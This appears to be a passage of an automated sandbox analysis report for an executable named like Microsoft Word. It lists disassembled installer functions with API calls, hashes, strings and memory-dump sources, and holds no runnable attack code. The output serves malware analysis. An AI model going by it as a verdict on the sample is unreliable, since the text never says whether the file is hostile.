                                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                        Strings
                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                        • API String ID: 1033533793-945480824
                                                                                        • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                        • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                        Strings
                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                        • API String ID: 2014279497-3433828417
                                                                                        • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                        • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                        • MulDiv.KERNEL32(0000E400,00000064,?), ref: 00403295
                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                        • wsprintfW.USER32 ref: 00404457
                                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s$@rD
                                                                                        • API String ID: 3540041739-1813061909
                                                                                        • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                        • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                        APIs
                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: *?|<>/":
                                                                                        • API String ID: 589700163-165019052
                                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                        APIs
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1912718029-0
                                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                        • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                        APIs
                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmp
                                                                                         • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                        • API String ID: 1697273262-1764544995
                                                                                        • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                        • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
APIs
• IsWindowVisible.USER32(?), ref: 00404902
• CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Strings
Memory Dump Source
• Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmp
